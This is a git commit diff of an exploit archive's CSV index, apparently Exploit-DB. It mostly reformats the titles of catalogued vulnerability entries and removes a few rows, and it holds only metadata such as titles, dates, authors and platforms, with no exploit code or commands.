Offensive Security 2013-12-03 22:42:55 +00:00
parent fffbf04102
commit 18d0bd4ec0
77 changed files with 2621 additions and 2354 deletions

files.csv

@ -10054,7 +10054,7 @@ id,file,description,date,author,platform,type,port
10874,platforms/php/webapps/10874.txt,"Pre News Manager (nid) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
10877,platforms/php/webapps/10877.txt,"php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
10878,platforms/php/webapps/10878.txt,"Invision Power Board(Trial) v2.0.4 Backup Vulnerability",2009-12-31,indoushka,php,webapps,0
10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup Vulnerability",2009-12-31,indoushka,php,webapps,0
10879,platforms/windows/dos/10879.html,"Google Chrome 3.0195.38 Status Bar Obfuscation",2009-12-31,"599eme Man",windows,dos,0
10880,platforms/php/webapps/10880.php,"bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit",2009-12-31,cOndemned,php,webapps,0
10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 .aap BOF DOS Vulnerability",2009-12-31,jacky,windows,dos,0
@ -15578,7 +15578,7 @@ id,file,description,date,author,platform,type,port
17959,platforms/php/webapps/17959.txt,"POSH Multiple Vulnerabilities",2011-10-10,Crashfr,php,webapps,0
17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 (SVG layout) Memory Corruption (0day)",2011-10-10,"Jose A. Vazquez",windows,remote,0
17961,platforms/php/webapps/17961.txt,"MyBB Advanced Forum Signatures (afsignatures-2.0.4) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0
17962,platforms/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar v2.2) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0
17962,platforms/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,php,webapps,0
17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server <= 1.0 Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0
17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN <= 8.0.0.7 Use After Free",2011-10-10,"Luigi Auriemma",windows,dos,0
17965,platforms/windows/dos/17965.txt,"OPC Systems.NET <= 4.00.0048 Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0
@ -15586,7 +15586,7 @@ id,file,description,date,author,platform,type,port
17967,platforms/windows/local/17967.rb,"TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability",2011-10-11,metasploit,windows,local,0
17969,platforms/multiple/remote/17969.py,"Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC",2011-10-11,"Rodrigo Marcos",multiple,remote,0
17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability",2011-10-11,cheki,php,webapps,0
17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 SQL Injection Vulnerability",2011-10-12,Mario_Vs,php,webapps,0
17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection Vulnerability",2011-10-12,Mario_Vs,php,webapps,0
17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin <= 1.9.10 SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0
17974,platforms/windows/remote/17974.html,"Mozilla Firefox Array.reduceRight() Integer Overflow Exploit",2011-10-12,"Matteo Memelli",windows,remote,0
17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",2011-10-12,metasploit,windows,remote,0
@ -19251,7 +19251,7 @@ id,file,description,date,author,platform,type,port
22000,platforms/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 Admin Interface Cross Site Scripting Vulnerability",2002-11-08,euronymous,cgi,remote,0
22001,platforms/windows/remote/22001.txt,"Simple Web Server 0.5.1 File Disclosure Vulnerability",2002-11-08,"Tamer Sahin",windows,remote,0
22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 Application Packager Non-Explicit Path Execution Vulnerability",2002-11-08,Texonet,linux,local,0
22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection",2012-10-16,Zixem,php,webapps,0
22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) - SQL Injection",2012-10-16,Zixem,php,webapps,0
22004,platforms/php/webapps/22004.txt,"Joomla iCagenda Component (id parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0
22005,platforms/hardware/webapps/22005.txt,"Visual Tools DVR <= 3.0.6.16, VX Series <= 4.2.19.2 Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0
22006,platforms/windows/dos/22006.txt,"Ezhometech EzServer 7.0 Remote Heap Corruption Vulnerability",2012-10-16,"Lorenzo Cantoni",windows,dos,0
@ -19642,7 +19642,7 @@ id,file,description,date,author,platform,type,port
22401,platforms/windows/dos/22401.php,"Internet Explorer 9 Memory Corruption Crash PoC",2012-11-01,"Jean Pascal Pereira",windows,dos,0
22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) WriteAV Crash PoC",2012-11-01,coolkaveh,windows,dos,0
22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog (index.php, product_id parameter) SQL Injection Vulnerability",2012-11-01,D4NB4R,php,webapps,0
22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin SQL Injection",2012-11-01,Zixem,php,webapps,0
22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0
22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0
22407,platforms/hardware/dos/22407.txt,"Netgear 1.x ProSafe VPN Firewall Web Interface Login Denial Of Service Vulnerability",2003-03-21,"Paul Kurczaba",hardware,dos,0
22408,platforms/cgi/webapps/22408.txt,"Planetmoon Guestbook Clear Text Password Retrieval Vulnerability",2003-03-21,subj,cgi,webapps,0
@ -20322,7 +20322,7 @@ id,file,description,date,author,platform,type,port
23101,platforms/windows/dos/23101.c,"Microsoft Windows 98 Fragmented UDP Flood Denial Of Service Vulnerability",2003-09-04,WARL0RD,windows,dos,0
23102,platforms/windows/dos/23102.pl,"FoxWeb 2.5 PATH_INFO Remote Buffer Overrun Vulnerability",2003-06-27,pokleyzz,windows,dos,0
23103,platforms/php/webapps/23103.txt,"Digital Scribe 1.x Error Function Cross-Site Scripting Vulnerability",2003-09-05,Secunia,php,webapps,0
23105,platforms/php/webapps/23105.txt,"myBB KingChat Plugin SQL Injection",2012-12-03,Red_Hat,php,webapps,0
23105,platforms/php/webapps/23105.txt,"myBB KingChat Plugin - SQL Injection",2012-12-03,Red_Hat,php,webapps,0
23106,platforms/php/webapps/23106.txt,"SchoolCMS Persistent XSS",2012-12-03,VipVince,php,webapps,0
23107,platforms/windows/dos/23107.txt,"Opera Web Browser 12.11 Crash PoC",2012-12-03,coolkaveh,windows,dos,0
23109,platforms/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 CSRF Vulnerability",2012-12-03,"Ben Williams",multiple,webapps,0
@ -20463,7 +20463,7 @@ id,file,description,date,author,platform,type,port
23246,platforms/windows/dos/23246.txt,"Sumatra 2.1.1/MuPDF 1.0 Integer Overflow",2012-12-09,beford,windows,dos,0
23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability",2003-10-25,Adik,windows,remote,0
23248,platforms/arm/dos/23248.txt,"Android Kernel 2.6 Local DoS Crash PoC",2012-12-09,G13,arm,dos,0
23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin Persistent XSS",2012-12-09,VipVince,php,webapps,0
23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent XSS",2012-12-09,VipVince,php,webapps,0
23250,platforms/hardware/webapps/23250.txt,"Cisco DPC2420 Multiples Vulnerabilities",2012-12-09,"Facundo M. de la Cruz",hardware,webapps,0
23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager v2.1.0.283 Local Root",2012-12-09,"Larry W. Cashdollar",linux,local,0
23252,platforms/php/webapps/23252.txt,"ClipBucket 2.6 Revision 738 Multiple SQL Injection Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0
@ -20495,9 +20495,9 @@ id,file,description,date,author,platform,type,port
23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0
23282,platforms/multiple/remote/23282.txt,"Apache Cocoon 2.14/2.2 Directory Traversal Vulnerability",2003-10-24,"Thierry De Leeuw",multiple,remote,0
23283,platforms/windows/remote/23283.txt,"Microsoft Internet Explorer 6.0 Local Resource Reference Vulnerability",2003-10-24,Mindwarper,windows,remote,0
23284,platforms/php/webapps/23284.txt,"MyBB Bank-v3 Plugin SQL Injection",2012-12-11,Red_Hat,php,webapps,0
23284,platforms/php/webapps/23284.txt,"MyBB Bank- 3 Plugin - SQL Injection",2012-12-11,Red_Hat,php,webapps,0
23286,platforms/php/webapps/23286.txt,"Joomla JooProperty 1.13.0 Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0
23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0
23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0
23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0
23289,platforms/php/webapps/23289.txt,"PHP Nuke 8.2.4 CSRF Vulnerability",2012-12-11,sajith,php,webapps,0
23290,platforms/windows/remote/23290.rb,"HP Data Protector DtbClsLogin Buffer Overflow",2012-12-11,metasploit,windows,remote,0
@ -20532,7 +20532,7 @@ id,file,description,date,author,platform,type,port
23319,platforms/php/webapps/23319.txt,"Tritanium Scripts Tritanium Bulletin Board 1.2.3 Unauthorized Access Vulnerability",2003-10-31,"Virginity Security",php,webapps,0
23320,platforms/multiple/remote/23320.txt,"Mldonkey 2.5 -4 Web Interface Error Message Cross-site Scripting Vulnerability",2003-10-31,"Chris Sharp",multiple,remote,0
23321,platforms/windows/remote/23321.txt,"Microsoft Internet Explorer 6-10 Mouse Tracking",2012-12-12,"Nick Johnson",windows,remote,0
23322,platforms/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin Multiple Vulnerabilities",2012-12-12,VipVince,php,webapps,0
23322,platforms/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,php,webapps,0
23323,platforms/windows/remote/23323.py,"Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability (0day)",2012-12-12,Abysssec,windows,remote,0
23324,platforms/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 Path Traversal Vulnerability",2012-12-12,"Sebastian Perez",windows,webapps,0
23325,platforms/multiple/dos/23325.c,"BRS WebWeaver 1.06 httpd `User-Agent` Remote Denial of Service Vulnerability",2003-11-01,D4rkGr3y,multiple,dos,0
@ -20563,11 +20563,11 @@ id,file,description,date,author,platform,type,port
23350,platforms/linux/local/23350.c,"TerminatorX 3.8 Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (1)",2003-11-07,c0wboy,linux,local,0
23351,platforms/linux/local/23351.c,"TerminatorX 3.8 Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (2)",2003-11-07,Bobby,linux,local,0
23352,platforms/linux/local/23352.c,"TerminatorX 3.8 Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (3)",2003-11-07,"m00 security",linux,local,0
23353,platforms/php/webapps/23353.txt,"MyYoutube MyBB Plugin 1.0 SQL Injection",2012-12-13,Zixem,php,webapps,0
23354,platforms/php/webapps/23354.txt,"MyBB AJAX Chat Persistent XSS Vulnerability",2012-12-13,"Mr. P-teo",php,webapps,0
23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 Persistant XSS",2012-12-13,limb0,php,webapps,0
23353,platforms/php/webapps/23353.txt,"MyYoutube MyBB Plugin 1.0 - SQL Injection",2012-12-13,Zixem,php,webapps,0
23354,platforms/php/webapps/23354.txt,"MyBB AJAX Chat - Persistent XSS Vulnerability",2012-12-13,"Mr. P-teo",php,webapps,0
23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistant XSS",2012-12-13,limb0,php,webapps,0
23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin Wordpress Plugin Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0
23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin (newreply.php) SQL Injection Vulnerability",2012-12-13,JoinSe7en,php,webapps,0
23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin (newreply.php) - SQL Injection Vulnerability",2012-12-13,JoinSe7en,php,webapps,0
23360,platforms/linux/remote/23360.rb,"PostgreSQL for Linux Payload Execution",2012-12-13,metasploit,linux,remote,0
23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0
23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3-2.3.9-4 Blind SQL Injection Exploit",2012-12-13,modpr0be,php,webapps,0
@ -20590,7 +20590,7 @@ id,file,description,date,author,platform,type,port
23379,platforms/hardware/remote/23379.txt,"FortiGate Firewall 2.x selector Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0
23380,platforms/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 Error Message Cross-Site Scripting Vulnerability",2003-11-13,"Oliver Karow",multiple,remote,0
23381,platforms/php/webapps/23381.txt,"phpWebFileManager 2.0 index.php Directory Traversal Vulnerability",2003-11-17,"RusH security team",php,webapps,0
23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 Cross Site Scripting",2012-12-14,s3m00t,php,webapps,0
23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross Site Scripting",2012-12-14,s3m00t,php,webapps,0
23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 $path Remote File Include Vulnerability",2003-11-17,"RusH security team",php,webapps,0
23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service Cross-Site Scripting Vulnerability",2003-11-17,"Ziv Kamir",multiple,remote,0
23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 Cross-Site Scripting Vulnerability",2003-11-17,"David Sopas Ferreira",php,webapps,0
@ -20631,7 +20631,7 @@ id,file,description,date,author,platform,type,port
23421,platforms/cgi/webapps/23421.txt,"CalaCode @mail Webmail System 3.52 Multiple Vulnerabilities",2003-12-09,"Nick Gudov",cgi,webapps,0
23422,platforms/windows/remote/23422.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0
23423,platforms/windows/remote/23423.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0
23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 Stored XSS",2012-12-16,limb0,php,webapps,0
23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Stored XSS",2012-12-16,limb0,php,webapps,0
23427,platforms/linux/dos/23427.txt,"Totem Movie Player (Ubuntu) 3.4.3 Stack Corruption",2012-12-16,coolkaveh,linux,dos,0
23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server user.php Script Unauthorized Access Vulnerability",2003-12-10,frog,php,webapps,0
23429,platforms/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server SQL Injection Vulnerability",2003-12-10,"Chintan Trivedi",php,webapps,0
@ -20819,8 +20819,8 @@ id,file,description,date,author,platform,type,port
23621,platforms/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 PHP Script admin.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0
23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 Remote Port Forwarding Shellcode 87 bytes",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
23623,platforms/php/webapps/23623.txt,"City Directory Review and Rating Script (search.php) SQL Injection Vulnerability",2012-12-24,3spi0n,php,webapps,0
23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags SQL Injection",2012-12-24,JoinSe7en,php,webapps,0
23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin (index.php, id parameter) SQL Injection Vulnerability",2012-12-24,Red_Hat,php,webapps,0
23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps,0
23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin (index.php, id parameter) - SQL Injection Vulnerability",2012-12-24,Red_Hat,php,webapps,0
23628,platforms/php/webapps/23628.txt,"JBrowser 1.0/2.x Unauthorized Admin Access Vulnerability",2004-01-30,"Himeur Nourredine",php,webapps,0
23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 Remote Command Execution Vulnerability",2004-01-31,ActualMInd,cgi,webapps,0
23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 File Disclosure Vulnerability",2004-01-31,"Zero X",php,webapps,0
@ -20974,7 +20974,7 @@ id,file,description,date,author,platform,type,port
23778,platforms/hardware/dos/23778.c,"Motorola T720 Phone Denial Of Service Vulnerability",2004-03-01,"Shaun Colley",hardware,dos,0
23779,platforms/linux/dos/23779.txt,"Grep < 2.11 Integer Overflow Crash PoC",2012-12-31,"Joshua Rogers",linux,dos,0
23780,platforms/windows/dos/23780.py,"Aktiv Player 2.80 Crash PoC",2012-12-31,IndonesiaGokilTeam,windows,dos,0
23781,platforms/php/webapps/23781.txt,"MyBB (editpost.php, posthash) SQL Injection Vulnerability",2012-12-31,"Joshua Rogers",php,webapps,0
23781,platforms/php/webapps/23781.txt,"MyBB (editpost.php, posthash) - SQL Injection Vulnerability",2012-12-31,"Joshua Rogers",php,webapps,0
23782,platforms/php/webapps/23782.txt,"Joomla Spider Calendar (index.php, date param) Blind SQL Injection Vulnerability",2012-12-31,Red-D3v1L,php,webapps,0
23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 PLF Exploit DEP/ASLR Bypass (MSF)",2012-12-31,"Craig Freyman",windows,local,0
23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",2013-01-02,metasploit,windows,remote,0
@ -21076,7 +21076,7 @@ id,file,description,date,author,platform,type,port
23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0
23886,platforms/windows/webapps/23886.txt,"Simple Webserver 2.3-rc1 Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0
23887,platforms/windows/remote/23887.rb,"Enterasys NetSight nssyslogd.exe Buffer Overflow",2013-01-04,metasploit,windows,remote,0
23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0
23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0
23890,platforms/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x HTML Injection Vulnerability",2004-03-29,"koi8-r Shelz",cgi,webapps,0
23891,platforms/asp/webapps/23891.txt,"Alan Ward A-Cart 2.0 category.asp catcode Parameter SQL Injection",2004-03-29,"Manuel Lopez",asp,webapps,0
23892,platforms/linux/local/23892.c,"Systrace 1.x Local Policy Bypass Vulnerability",2004-03-29,Brad,linux,local,0
@ -25322,7 +25322,7 @@ id,file,description,date,author,platform,type,port
28280,platforms/php/webapps/28280.txt,"wwwThreads Calendar.PHP Cross-Site Scripting Vulnerability",2006-07-26,l2odon,php,webapps,0
28281,platforms/php/webapps/28281.txt,"phpbb-auction 1.x auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
28283,platforms/php/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,php,webapps,0
28283,platforms/hardware/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0
28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution",2013-09-15,Blake,windows,remote,0
28285,platforms/php/webapps/28285.txt,"Zyxel Prestige 660H-61 ADSL Router RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,php,webapps,0
28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability",2006-07-27,hdm,windows,dos,0
@ -26171,7 +26171,6 @@ id,file,description,date,author,platform,type,port
29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 ticketview.php Multiple Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0
29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 ticket.php email Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0
29167,platforms/windows/remote/29167.rb,"NetGear WG311v1 Wireless Driver 2.3.1 10 SSID Heap Buffer Overflow Vulnerability",2006-11-22,"Laurent Butti",windows,remote,0
29168,platforms/osx/remote/29168.pl,"Apple Remote Desktop 3.7 - PoC",2013-10-25,"S2 Crew",osx,remote,0
29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 Keystone.EXE Local Denial of Service Vulnerability",2006-11-23,Hessam-x,windows,dos,0
29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional File Handling Buffer Overflow Vulnerability",2006-11-23,LSsec.com,windows,remote,0
29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 HTMLMARQ.OCX Library Denial of Service Vulnerability",2006-11-22,"Michal Bucko",windows,dos,0
@ -26306,7 +26305,6 @@ id,file,description,date,author,platform,type,port
29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0
29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0
29316,platforms/php/remote/29316.py,"Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner v2)",2013-10-31,noptrix,php,remote,0
29317,platforms/php/local/29317.txt,"MOD_PHP - Bypass Symlink From Sihosin Patch",2013-10-31,virusa.worm,php,local,0
29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0
29319,platforms/php/remote/29319.rb,"vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution",2013-10-31,metasploit,php,remote,80
29320,platforms/php/remote/29320.rb,"NAS4Free - Arbitrary Remote Code Execution",2013-10-31,metasploit,php,remote,80
@ -26488,8 +26486,6 @@ id,file,description,date,author,platform,type,port
29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 Show.PHP Cross-Site Scripting Vulnerability",2007-01-22,Linux_Drox,php,webapps,0
29508,platforms/php/webapps/29508.sh,"Vote! Pro 4.0 Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps,0
29509,platforms/osx/dos/29509.txt,"Apple Mac OS X 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption Vulnerability",2007-01-23,LMH,osx,dos,0
29510,platforms/windows/remote/29510.txt,"Microsoft Internet Explorer ""AddDesktopComponent()"" - Cross Zone Scripting Remote Code Execution Vulnerability",2013-11-08,"Eduardo Prado",windows,remote,0
29511,platforms/windows/remote/29511.txt,"Microsoft Internet Explorer - File Download Extension Spoofing Vulnerability",2013-11-08,"Eduardo Prado",windows,remote,0
29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 - 2.0.18.5 (class.utilitycontroller.php) - PHP Object Injection Vulnerability",2013-11-08,EgiX,php,webapps,80
29513,platforms/linux/remote/29513.rb,"VICIdial Manager Send OS Command Injection",2013-11-08,metasploit,linux,remote,80
29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection Vulnerability",2013-11-08,"High-Tech Bridge SA",php,webapps,80
@ -26678,7 +26674,7 @@ id,file,description,date,author,platform,type,port
29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez, Eduardo Arriols",linux,remote,0
29707,platforms/windows/dos/29707.txt,"JPEGView 1.0.29 - Crash PoC",2013-11-19,"Debasish Mandal",windows,dos,0
29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80
29711,platforms/linux/dos/29711.txt,"Linux Kernel bt8xx Video Driver IOCTL Heap Overflow",2013-11-19,x90c,linux,dos,0
29711,platforms/linux/dos/29711.txt,"Linux Kernel bt8xx Video Driver IOCTL - Heap Overflow",2013-11-19,x90c,linux,dos,0
29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 PHP.INI File Modification Vulnerability",2007-03-03,"Stefan Esser",php,local,0
29713,platforms/linux/dos/29713.html,"KDE Konqueror 3.5 JavaScript IFrame Denial of Service Vulnerability",2007-03-05,mark,linux,dos,0
29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - Sys_Tee Local Privilege Escalation Vulnerability",2007-03-05,"Michael Kerrisk",linux,local,0
@ -26797,9 +26793,6 @@ id,file,description,date,author,platform,type,port
29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0
29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0
29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins Remote File Upload Vulnerability",2013-11-26,link_satisi,php,webapps,0
29835,platforms/php/webapps/29835.txt,"geecomPROMO 1.5 Multiple SQL injection vulnerability",2013-11-26,"Andrea Scarpa",php,webapps,0
29836,platforms/php/webapps/29836.txt,"appRain-v-3.0.2::Stored XSS on multiple parameters & CSRF vulnerability's",2013-11-26,sajith,php,webapps,0
29837,platforms/php/webapps/29837.txt,"Open TestBed framework arbitrary file upload exploit",2013-11-26,"3rr0r1046 IndiShell",php,webapps,0
29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0
29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0
29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
@ -26878,16 +26871,14 @@ id,file,description,date,author,platform,type,port
29914,platforms/php/webapps/29914.txt,"Doruk100Net Info.PHP Remote File Include Vulnerability",2007-04-26,Ali7,php,webapps,0
29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x Index.PHP Cross-Site Scripting Vulnerability",2007-04-26,"En Douli",php,webapps,0
29916,platforms/linux/dos/29916.c,"Linux Kernel 2.6.x NETLINK_FIB_LOOKUP Local Denial of Service Vulnerability",2007-04-26,"Alexey Kuznetsov",linux,dos,0
29917,platforms/php/webapps/29917.php,"FlashComs Chat - Arbitrary File Upload Vulnerability",2013-11-30,"Miya Chung",php,webapps,0
29917,platforms/php/webapps/29917.php,"FlashComs Chat <= 6.5 - Arbitrary File Upload Vulnerability",2013-11-30,"Miya Chung",php,webapps,0
29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - (lang parameter) XPath Injection Vulnerability",2013-11-30,LiquidWorm,java,webapps,0
29919,platforms/hardware/dos/29919.py,"TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite N Router HTTP DoS",2013-11-30,"Dino Causevic",hardware,dos,0
29920,platforms/linux/dos/29920.py,"Uptime Agent 5.0.1 - Stack Overflow Vulnerability",2013-11-30,"Denis Andzakovic",linux,dos,0
29921,platforms/php/webapps/29921.py,"Zend-Framework - Full Info Disclosure",2013-11-30,"Ariel Orellana",php,webapps,0
29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - (.wps) Buffer Overflow Exploit (SEH)",2013-11-30,"Julien Ahrens",windows,local,0
29923,platforms/php/webapps/29923.txt,"IP Board 3.4.6 - Stored XSS",2013-11-30,"Ciaran McNally",php,webapps,0
